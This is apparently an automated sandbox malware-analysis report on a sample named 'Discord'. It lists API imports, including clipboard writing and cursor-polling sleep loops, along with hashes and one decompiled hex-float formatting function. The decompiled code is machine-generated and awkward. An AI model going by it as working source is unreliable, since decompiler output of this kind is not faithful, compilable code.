Source File: 0000000E.00000002.771715150.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.771666163.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771776151.0000000000404000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771818604.0000000000407000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771867992.000000000040A000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_Discord .jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
String ID:
API String ID: 649803965-0
Opcode ID: 549396031b52787fda1a3538fad49cd9476c55bdd92f750e380d2e62cbc14c0a
Instruction ID: 7ff81eccd83697fa7be79abd4667ff17df066105e1159380c5cb2c27b849e3ba
Opcode Fuzzy Hash: 549396031b52787fda1a3538fad49cd9476c55bdd92f750e380d2e62cbc14c0a
Instruction Fuzzy Hash: D7816DB1A042008FD710EF69D68475A77E0FB44308F02893EE945BB3B1D779A855CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00401500 Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00401515
LoadLibraryA.KERNEL32 ref: 0040152C
GetProcAddress.KERNEL32 ref: 00401545
GetModuleHandleA.KERNEL32 ref: 00401573
GetProcAddress.KERNEL32 ref: 0040158C

Strings

libgcj-13.dll, xrefs: 0040156C
__register_frame_info, xrefs: 0040153A
`@, xrefs: 00401552
_Jv_RegisterClasses, xrefs: 00401581
libgcc_s_dw2-1.dll, xrefs: 0040150E, 00401525

Memory Dump Source

Source File: 0000000E.00000002.771715150.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.771666163.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771776151.0000000000404000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771818604.0000000000407000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771867992.000000000040A000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_Discord .jbxd

Similarity

API ID: AddressHandleModuleProc$LibraryLoad
String ID: `@$_Jv_RegisterClasses$__register_frame_info$libgcc_s_dw2-1.dll$libgcj-13.dll
API String ID: 652391981-2843679540
Opcode ID: a7ba75eb2f59fa39df50648f672a7913c7ecfde961e3ff50f7a48ec10bf809be
Instruction ID: a4e463e90228cfbee68be7b9de9f8b1df1f387805245e9cf46cebd54efa00ef3
Opcode Fuzzy Hash: a7ba75eb2f59fa39df50648f672a7913c7ecfde961e3ff50f7a48ec10bf809be
Instruction Fuzzy Hash: 6B015EB09092009BD710BF78AE0825A7EE4EF80345F05853ADD86BB394D778D814CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 6DE822F0 Relevance: 12.1, APIs: 8, Instructions: 65clipboardmemoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 6DE8232C
OpenClipboard.USER32 ref: 6DE8233E
EmptyClipboard.USER32 ref: 6DE82353
GlobalAlloc.KERNEL32 ref: 6DE82368
GlobalLock.KERNEL32 ref: 6DE8237A
MultiByteToWideChar.KERNEL32 ref: 6DE823AA
GlobalUnlock.KERNEL32 ref: 6DE823B2
SetClipboardData.USER32 ref: 6DE823C6

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: ClipboardGlobal$ByteCharMultiWide$AllocDataEmptyLockOpenUnlock
String ID:
API String ID: 1314454821-0
Opcode ID: 3854682571560f59797905d2f3cc1c418045e3d5a960f9cd373ab07dc81bbec1
Instruction ID: 9c091cb92789350ba4c523c07139cb1493be23ae11ab6bfe8d6919d135b28d38
Opcode Fuzzy Hash: 3854682571560f59797905d2f3cc1c418045e3d5a960f9cd373ab07dc81bbec1
Instruction Fuzzy Hash: 9D2109B19083028FD710BF7AD95831EBFF4BB51315F05992EE8D89A281E7789448CB93

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8A910 Relevance: 10.6, APIs: 7, Instructions: 67sleepCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 6DE8A924
Sleep.KERNEL32 ref: 6DE8A9E7

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: CursorSleep
String ID:
API String ID: 4211308429-0
Opcode ID: 118c7c8343ed8243253211d1658cf6f07095800395f790ff4cae0a37ddbd535c
Instruction ID: 246fd57aab7c12acf55f3c916e3630932357a6cc1ac089149cc605b5664d753a
Opcode Fuzzy Hash: 118c7c8343ed8243253211d1658cf6f07095800395f790ff4cae0a37ddbd535c
Instruction Fuzzy Hash: 182160B05486468BEB14EF38D18891EBBF5AB91304F21892DD4DA97295EB30E449CB93

Uniqueness

Uniqueness Score: -1.00%

Function 00401FBC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0040200F
UnhandledExceptionFilter.KERNEL32 ref: 0040201F
GetCurrentProcess.KERNEL32 ref: 00402028
TerminateProcess.KERNEL32 ref: 00402039
abort.MSVCRT ref: 00402042

Strings

`c@, xrefs: 00402018

Memory Dump Source

Source File: 0000000E.00000002.771715150.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.771666163.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771776151.0000000000404000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771818604.0000000000407000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771867992.000000000040A000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_Discord .jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
String ID: `c@
API String ID: 520269711-2409262022
Opcode ID: 81f01b54776b2658ad12626724f9bd02d2d3bcdd198732e80dc417d6f508526e
Instruction ID: b5d04c8a1180e745fbd7dcb808b6343da72b42bc217d93b429f117cb0b74965e
Opcode Fuzzy Hash: 81f01b54776b2658ad12626724f9bd02d2d3bcdd198732e80dc417d6f508526e
Instruction Fuzzy Hash: E901E4B4804205DFD700EFB9EB482497FF0BB09305F018439E98AAB365E774A954CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00401FC0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0040200F
UnhandledExceptionFilter.KERNEL32 ref: 0040201F
GetCurrentProcess.KERNEL32 ref: 00402028
TerminateProcess.KERNEL32 ref: 00402039
abort.MSVCRT ref: 00402042

Strings

`c@, xrefs: 00402018

Memory Dump Source

Source File: 0000000E.00000002.771715150.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.771666163.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771776151.0000000000404000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771818604.0000000000407000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771867992.000000000040A000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_Discord .jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
String ID: `c@
API String ID: 520269711-2409262022
Opcode ID: f72988fc4943421c58ceb2ef83f02463eeda736188179a04de74cee613971df6
Instruction ID: f91798b6e7aaafeb24b35a2e39425f2270b28079303700cc597ece6c2597e48a
Opcode Fuzzy Hash: f72988fc4943421c58ceb2ef83f02463eeda736188179a04de74cee613971df6
Instruction Fuzzy Hash: 6E01E4B4804205CFD700EFB9EB482487FF0BB09305F018439E98AAB365E774A554CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8A957 Relevance: 9.1, APIs: 6, Instructions: 55sleepsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 6DE8A977
GetCursorPos.USER32 ref: 6DE8A983
Sleep.KERNEL32 ref: 6DE8A98F
GetCursorPos.USER32 ref: 6DE8A997
Sleep.KERNEL32 ref: 6DE8A9A3
Sleep.KERNEL32 ref: 6DE8A9E7

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: Sleep$Cursor$ObjectSingleWait
String ID:
API String ID: 1987867245-0
Opcode ID: 3ece82212a64455451485049550260752ac3e1f4903710677f815ffa5dae3160
Instruction ID: dec78bdddfc5c5e40bdf6b32574adb075a4017bcc2f53e54138f93827b4de29b
Opcode Fuzzy Hash: 3ece82212a64455451485049550260752ac3e1f4903710677f815ffa5dae3160
Instruction Fuzzy Hash: 55111FB05486428FDB14EF38D18491DBBF1AF91304F258A2DD4DE97295EB30E849CB93

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8FD70 Relevance: 7.9, Strings: 6, Instructions: 376
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E6DE8FD70(signed int __eax) {
				signed short _t160;
				void* _t162;
				signed int _t167;
				intOrPtr _t177;
				void* _t178;
				signed int _t181;
				signed int _t189;
				intOrPtr _t210;
				intOrPtr _t213;
				signed char _t218;
				signed int _t219;
				signed char _t230;
				signed char _t233;
				signed char _t235;
				signed int _t237;
				signed int _t238;
				signed int _t245;
				signed short _t251;
				signed short _t253;
				signed int _t254;
				signed char _t256;
				signed int _t257;
				signed char _t259;
				signed int _t283;
				signed int _t284;
				signed int _t285;
				signed int _t290;
				signed int _t291;
				unsigned int _t292;
				signed int _t293;
				intOrPtr _t295;
				signed char _t296;
				void* _t297;
				signed int _t299;
				signed int _t303;
				void* _t308;
				signed int _t309;
				void* _t310;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed char _t317;
				void* _t319;
				void* _t320;
				void* _t355;

				_t217 = __eax;
				_t320 = _t319 - 0x5c;
				_t355 = st0;
				[tword [esp+0x28] = _t355;
				asm("fxam");
				asm("wait");
				asm("fnstsw ax");
				_t160 = __eax & 0x00004500;
				if(_t160 == 0x100) {
					st0 = _t355;
					_t162 = E6DE8EF60(0, __eax, 0x6de98268);
					L78:
					return _t162;
				}
				_t251 =  *(_t320 + 0x30) & 0x0000ffff;
				_t302 = _t251 & 0x00008000;
				if((_t251 & 0x00008000) != 0) {
					 *(__eax + 4) =  *(__eax + 4) | 0x00000080;
				}
				asm("fxam");
				asm("wait");
				asm("fnstsw ax");
				st0 = _t355;
				if((_t160 & 0x00004500) == 0x500) {
					_t162 = E6DE8EF60(_t302, _t217, 0x6de9826c);
					goto L78;
				} else {
					_t253 = _t251 & 0x00007fff;
					if(_t253 == 0) {
						_t285 =  *(_t320 + 0x2c);
						_t303 =  *(_t320 + 0x28);
						__eflags = _t285 | _t303;
						if((_t285 | _t303) == 0) {
							_t167 = 0;
							_t303 = 0;
							_t285 = 0;
							goto L5;
						}
						__eflags = _t285;
						if(_t285 < 0) {
							_t167 = 0xffffc002;
							goto L5;
						}
						_t284 = 0xffffc001;
						do {
							_t285 = (_t285 << 0x00000020 | _t303) << 1;
							_t167 = _t284;
							_t303 = _t303 + _t303;
							_t284 = _t284 - 1;
							__eflags = _t285;
						} while (_t285 >= 0);
						goto L5;
					} else {
						_t303 =  *(_t320 + 0x28);
						_t167 = _t253 - 0x3fff;
						_t285 =  *(_t320 + 0x2c);
						L5:
						_t254 =  *(_t217 + 0xc);
						if(_t254 <= 0xe) {
							while(1) {
								__eflags = _t285;
								if(_t285 < 0) {
									break;
								}
								_t285 = (_t285 << 0x00000020 | _t303) << 1;
								_t303 = _t303 + _t303;
								__eflags = _t303;
							}
							 *(_t320 + 0xc) = _t285 >> 1;
							_t230 = 0xe - _t254 << 2;
							 *(_t320 + 8) = (_t285 << 0x00000020 | _t303) >> 1;
							__eflags = _t230 & 0x00000020;
							_t313 =  !=  ? 4 : 0xbadbad << _t230;
							_t289 =  !=  ? 0 : 4 << _t230;
							 *(_t320 + 8) =  *(_t320 + 8) + ( !=  ? 0 : 4 << _t230);
							asm("adc [esp+0xc], ebp");
							_t314 =  *(_t320 + 0xc);
							_t290 =  *(_t320 + 8);
							__eflags = _t314;
							if(_t314 < 0) {
								_t167 = _t167 + 1;
							} else {
								_t299 = _t290 + _t290;
								__eflags = _t299;
								 *(_t320 + 8) = _t299;
								 *(_t320 + 0xc) = (_t314 << 0x00000020 | _t290) << 1;
							}
							_t291 =  *(_t320 + 0xc);
							_t233 = 0xf - _t254 << 2;
							_t292 = _t291 >> _t233;
							_t303 =  !=  ? _t292 : (_t291 << 0x00000020 |  *(_t320 + 8)) >> _t233;
							_t285 =  !=  ? 0 : _t292;
							L7:
							_t235 = _t320 + 0x38;
							_t316 = _t217;
							 *(_t320 + 0x14) = _t235;
							 *(_t320 + 8) = _t235;
							do {
								_t237 = _t303 & 0x0000000f;
								if(_t237 == _t303) {
									__eflags =  *(_t320 + 8) -  *(_t320 + 0x14);
									if( *(_t320 + 8) >  *(_t320 + 0x14)) {
										L51:
										_t218 =  *(_t320 + 8);
										_t256 = _t218 + 1;
										 *_t218 = 0x2e;
										L52:
										__eflags = _t285;
										if(_t285 > 0) {
											L54:
											_t219 = _t167 - 1;
											goto L55;
											do {
												do {
													L55:
													_t303 = (_t285 << 0x00000020 | _t303) >> 1;
													_t167 = _t219;
													_t285 = _t285 >> 1;
													__eflags = _t285;
													_t219 = _t167 - 1;
												} while (_t285 > 0);
												__eflags = _t303 - 1;
											} while (_t303 > 1);
											L57:
											_t303 = 0;
											_t285 = 0;
											goto L12;
										}
										__eflags = _t303 - 1;
										if(_t303 <= 1) {
											goto L57;
										}
										goto L54;
									}
									__eflags =  *(_t316 + 5) & 0x00000008;
									if(( *(_t316 + 5) & 0x00000008) != 0) {
										goto L51;
									}
									_t256 =  *(_t320 + 8);
									__eflags =  *(_t316 + 0xc);
									if( *(_t316 + 0xc) <= 0) {
										goto L52;
									}
									goto L51;
								} else {
									_t257 =  *(_t316 + 0xc);
									if(_t257 > 0) {
										 *(_t316 + 0xc) = _t257 - 1;
									}
									_t256 =  *(_t320 + 8);
									_t303 = (_t285 << 0x00000020 | _t303) >> 4;
									_t285 = _t285 >> 4;
									L12:
									if(_t237 == 0) {
										__eflags = _t256 -  *(_t320 + 0x14);
										if(_t256 >  *(_t320 + 0x14)) {
											L45:
											 *(_t320 + 8) = _t256 + 1;
											L46:
											_t238 = _t237 + 0x30;
											L15:
											 *_t256 = _t238;
											goto L16;
										}
										__eflags =  *(_t316 + 0xc);
										if( *(_t316 + 0xc) < 0) {
											 *(_t320 + 8) = _t256;
											goto L16;
										}
										goto L45;
									}
									 *(_t320 + 8) = _t256 + 1;
									if(_t237 <= 9) {
										goto L46;
									}
									_t238 = _t237 + 0x00000037 |  *(_t316 + 4) & 0x20;
									goto L15;
								}
								L16:
							} while ((_t285 | _t303) != 0);
							_t217 = _t316;
							_t317 =  *(_t320 + 8);
							if(_t317 ==  *(_t320 + 0x14)) {
								_t254 =  *(_t217 + 0xc);
								L89:
								_t293 =  *(_t217 + 4);
								__eflags = _t254;
								 *(_t320 + 8) = _t293;
								if(_t254 <= 0) {
									__eflags = _t293 & 0x00000800;
									_t259 =  *(_t320 + 0x14);
									if((_t293 & 0x00000800) == 0) {
										L91:
										_t317 = _t259 + 1;
										 *_t259 = 0x30;
										L19:
										_t295 =  *((intOrPtr*)(_t217 + 8));
										 *((intOrPtr*)(_t320 + 0x18)) = _t295;
										if(_t295 <= 0) {
											_t308 = 2;
											 *(_t320 + 0x1c) = _t167;
											L60:
											__eflags =  *(_t320 + 8) & 0x00000080;
											if(( *(_t320 + 8) & 0x00000080) != 0) {
												L31:
												E6DE8ED70(0x2d, _t217);
												L63:
												E6DE8ED70(0x30, _t217);
												E6DE8ED70( *(_t217 + 4) & 0x00000020 | 0x00000058, _t217);
												_t177 =  *((intOrPtr*)(_t217 + 8));
												if(_t177 <= 0 || ( *(_t217 + 5) & 0x00000002) == 0) {
													L67:
													_t296 =  *(_t320 + 0x14);
													if(_t317 >  *(_t320 + 0x14)) {
														do {
															_t317 = _t317 - 1;
															_t178 =  *_t317;
															__eflags = _t178 - 0x2e;
															if(_t178 == 0x2e) {
																E6DE8F5C0(_t217);
															} else {
																__eflags = _t178 - 0x2c;
																if(_t178 == 0x2c) {
																	_t189 =  *(_t217 + 0x1c) & 0x0000ffff;
																	__eflags = _t189;
																	 *(_t320 + 0x26) = _t189;
																	if(__eflags != 0) {
																		E6DE8EDD0(_t320 + 0x26, _t217, 1, __eflags);
																	}
																} else {
																	E6DE8ED70(_t178, _t217);
																}
															}
															__eflags = _t317 - _t296;
														} while (_t317 != _t296);
														while(1) {
															L76:
															_t181 =  *(_t217 + 0xc);
															 *(_t217 + 0xc) = _t181 - 1;
															if(_t181 <= 0) {
																break;
															}
															E6DE8ED70(0x30, _t217);
														}
														E6DE8ED70( *(_t217 + 4) & 0x00000020 | 0x00000050, _t217);
														 *((intOrPtr*)(_t217 + 8)) =  *((intOrPtr*)(_t217 + 8)) + _t308;
														 *(_t217 + 4) =  *(_t217 + 4) | 0x000001c0;
														asm("cdq");
														_t162 = E6DE8EFF0( *(_t320 + 0x1c), _t217, _t217);
														goto L78;
													}
													goto L76;
												} else {
													 *((intOrPtr*)(_t217 + 8)) = _t177 - 1;
													do {
														E6DE8ED70(0x30, _t217);
														_t132 =  *((intOrPtr*)(_t217 + 8)) - 1; // 0xfffffffe
														 *((intOrPtr*)(_t217 + 8)) = _t132;
													} while ( *((intOrPtr*)(_t217 + 8)) > 0);
													goto L67;
												}
											}
											L61:
											__eflags =  *(_t320 + 8) & 0x00000100;
											if(( *(_t320 + 8) & 0x00000100) != 0) {
												E6DE8ED70(0x2b, _t217);
											} else {
												__eflags =  *(_t320 + 8) & 0x00000040;
												if(( *(_t320 + 8) & 0x00000040) != 0) {
													E6DE8ED70(0x20, _t217);
												}
											}
											goto L63;
										}
										_t309 = _t167;
										_t273 = _t317 -  *(_t320 + 0x14);
										 *(_t320 + 0x1c) = _t309;
										_t274 =  >  ? _t317 -  *(_t320 + 0x14) +  *(_t217 + 0xc) : _t273;
										asm("sbb eax, eax");
										_t297 = ( >  ? _t317 -  *(_t320 + 0x14) +  *(_t217 + 0xc) : _t273) + ( *(_t320 + 8) & 0x000001c0) + 6;
										_t245 = (_t309 * 0x66666667 >> 0x20 >> 2) - (_t309 >> 0x1f);
										if(_t245 == 0) {
											_t308 = 2;
											L24:
											if( *((intOrPtr*)(_t320 + 0x18)) <= _t297) {
												 *((intOrPtr*)(_t217 + 8)) = 0xffffffff;
												goto L60;
											}
											_t210 =  *((intOrPtr*)(_t320 + 0x18)) - _t297;
											if(( *(_t320 + 8) & 0x00000600) != 0) {
												 *((intOrPtr*)(_t217 + 8)) = _t210;
												goto L60;
											}
											 *((intOrPtr*)(_t217 + 8)) = _t210 - 1;
											if(_t210 <= 0) {
												goto L60;
											}
											do {
												E6DE8ED70(0x20, _t217);
												_t213 =  *((intOrPtr*)(_t217 + 8));
												 *((intOrPtr*)(_t217 + 8)) = _t213 - 1;
											} while (_t213 > 0);
											 *(_t320 + 8) =  *(_t217 + 4);
											if(( *(_t320 + 8) & 0x00000080) == 0) {
												goto L61;
											}
											goto L31;
										}
										_t310 = 2;
										do {
											_t297 = _t297 + 1;
											_t310 = _t310 + 1;
											_t283 = (0x66666667 * _t245 >> 0x20 >> 2) - (_t245 >> 0x1f);
											_t245 = _t283;
										} while (_t283 != 0);
										_t308 = _t310;
										goto L24;
									}
								}
								 *(_t320 + 0x38) = 0x2e;
								_t259 = _t320 + 0x39;
								goto L91;
							}
							 *(_t320 + 8) =  *(_t217 + 4);
							goto L19;
						}
						if((_t285 | _t303) == 0) {
							 *(_t320 + 0x14) = _t320 + 0x38;
							goto L89;
						}
						goto L7;
					}
				}
			}

0x6de8fd74
0x6de8fd76
0x6de8fd7d
0x6de8fd7f
0x6de8fd83
0x6de8fd85
0x6de8fd86
0x6de8fd88
0x6de8fd90
0x6de90205
0x6de90210
0x6de901a1
0x6de901a8
0x6de901a8
0x6de8fd96
0x6de8fd9d
0x6de8fda3
0x6de8ff51
0x6de8ff51
0x6de8fda9
0x6de8fdab
0x6de8fdac
0x6de8fdae
0x6de8fdb8
0x6de90220
0x00000000
0x6de8fdbe
0x6de8fdbe
0x6de8fdc3
0x6de8ffe6
0x6de8ffea
0x6de8fff0
0x6de8fff2
0x6de901c8
0x6de901ca
0x6de901cc
0x00000000
0x6de901cc
0x6de8fff8
0x6de8fffa
0x6de90260
0x00000000
0x6de90260
0x6de90000
0x6de90005
0x6de90005
0x6de90009
0x6de9000b
0x6de9000d
0x6de90010
0x6de90010
0x00000000
0x6de8fdc9
0x6de8fdc9
0x6de8fdcd
0x6de8fdd3
0x6de8fdd7
0x6de8fdd7
0x6de8fddd
0x6de8ff66
0x6de8ff66
0x6de8ff68
0x00000000
0x00000000
0x6de8ff60
0x6de8ff64
0x6de8ff64
0x6de8ff64
0x6de8ff79
0x6de8ff7d
0x6de8ff85
0x6de8ff90
0x6de8ff93
0x6de8ff96
0x6de8ff99
0x6de8ff9d
0x6de8ffa1
0x6de8ffa5
0x6de8ffa9
0x6de8ffab
0x6de901fd
0x6de8ffb1
0x6de8ffb5
0x6de8ffb5
0x6de8ffb7
0x6de8ffbb
0x6de8ffbb
0x6de8ffbf
0x6de8ffd0
0x6de8ffd6
0x6de8ffdb
0x6de8ffde
0x6de8fded
0x6de8fded
0x6de8fdf1
0x6de8fdf3
0x6de8fdf7
0x6de8fe00
0x6de8fe02
0x6de8fe07
0x6de90044
0x6de90048
0x6de90060
0x6de90060
0x6de90064
0x6de90067
0x6de9006a
0x6de9006a
0x6de9006d
0x6de90074
0x6de90074
0x6de90074
0x6de90077
0x6de90077
0x6de90077
0x6de90077
0x6de9007b
0x6de9007d
0x6de9007f
0x6de90082
0x6de90082
0x6de90087
0x6de90087
0x6de9008c
0x6de9008c
0x6de9008e
0x00000000
0x6de9008e
0x6de9006f
0x6de90072
0x00000000
0x00000000
0x00000000
0x6de90072
0x6de9004a
0x6de9004e
0x00000000
0x00000000
0x6de90053
0x6de90057
0x6de90059
0x00000000
0x00000000
0x00000000
0x6de8fe0d
0x6de8fe0d
0x6de8fe12
0x6de8fe17
0x6de8fe17
0x6de8fe1a
0x6de8fe1e
0x6de8fe22
0x6de8fe25
0x6de8fe27
0x6de90020
0x6de90024
0x6de9002d
0x6de90030
0x6de90034
0x6de90034
0x6de8fe49
0x6de8fe49
0x00000000
0x6de8fe49
0x6de90029
0x6de9002b
0x6de90095
0x00000000
0x6de90095
0x00000000
0x6de9002b
0x6de8fe33
0x6de8fe37
0x00000000
0x00000000
0x6de8fe47
0x00000000
0x6de8fe47
0x6de8fe4b
0x6de8fe4d
0x6de8fe51
0x6de8fe53
0x6de8fe5b
0x6de9025b
0x6de90232
0x6de90232
0x6de90235
0x6de90237
0x6de9023b
0x6de9026a
0x6de90270
0x6de90274
0x6de90246
0x6de90246
0x6de90249
0x6de8fe68
0x6de8fe68
0x6de8fe6d
0x6de8fe71
0x6de901ba
0x6de901bf
0x6de900a7
0x6de900a7
0x6de900ac
0x6de8ff40
0x6de8ff47
0x6de900cb
0x6de900d2
0x6de900e2
0x6de900e7
0x6de900ec
0x6de90119
0x6de9011d
0x6de90121
0x6de90147
0x6de90147
0x6de9014a
0x6de9014e
0x6de90151
0x6de901b2
0x6de90153
0x6de90153
0x6de90156
0x6de90125
0x6de90129
0x6de9012c
0x6de90131
0x6de9013e
0x6de9013e
0x6de90158
0x6de9015a
0x6de9015a
0x6de90156
0x6de90143
0x6de90143
0x6de9016e
0x6de9016e
0x6de9016e
0x6de90176
0x6de90179
0x00000000
0x00000000
0x6de90169
0x6de90169
0x6de90186
0x6de90191
0x6de90194
0x6de9019b
0x6de9019c
0x00000000
0x6de9019c
0x00000000
0x6de900f4
0x6de900f7
0x6de90100
0x6de90107
0x6de9010f
0x6de90114
0x6de90114
0x00000000
0x6de90100
0x6de900ec
0x6de900b2
0x6de900b2
0x6de900ba
0x6de901e2
0x6de900c0
0x6de900c0
0x6de900c5
0x6de901f3
0x6de901f3
0x6de900c5
0x00000000
0x6de900ba
0x6de8fe7a
0x6de8fe7f
0x6de8fe83
0x6de8fe90
0x6de8fe9b
0x6de8fe9d
0x6de8feb4
0x6de8feb6
0x6de90251
0x6de8fedd
0x6de8fee1
0x6de900a0
0x00000000
0x6de900a0
0x6de8feeb
0x6de8fef5
0x6de901d3
0x00000000
0x6de901d3
0x6de8ff00
0x6de8ff03
0x00000000
0x00000000
0x6de8ff10
0x6de8ff17
0x6de8ff1c
0x6de8ff24
0x6de8ff24
0x6de8ff2c
0x6de8ff35
0x00000000
0x00000000
0x00000000
0x6de8ff35
0x6de8febc
0x6de8fec1
0x6de8fec6
0x6de8fecb
0x6de8fed4
0x6de8fed6
0x6de8fed6
0x6de8feda
0x00000000
0x6de8feda
0x6de90276
0x6de9023d
0x6de90242
0x00000000
0x6de90242
0x6de8fe64
0x00000000
0x6de8fe64
0x6de8fde7
0x6de9022e
0x00000000
0x6de9022e
0x00000000
0x6de8fde7
0x6de8fdc3

Strings

NaN, xrefs: 6DE90209
@, xrefs: 6DE900C0
., xrefs: 6DE9023D
gfff, xrefs: 6DE8FEC1
Inf, xrefs: 6DE90219
gfff, xrefs: 6DE8FEA3

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID: .$@$Inf$NaN$gfff$gfff
API String ID: 0-3155045678
Opcode ID: 1c65fc73216ec635cd8940ec7e19918af3fdabcc223746e42e7f2e7ae18302e4
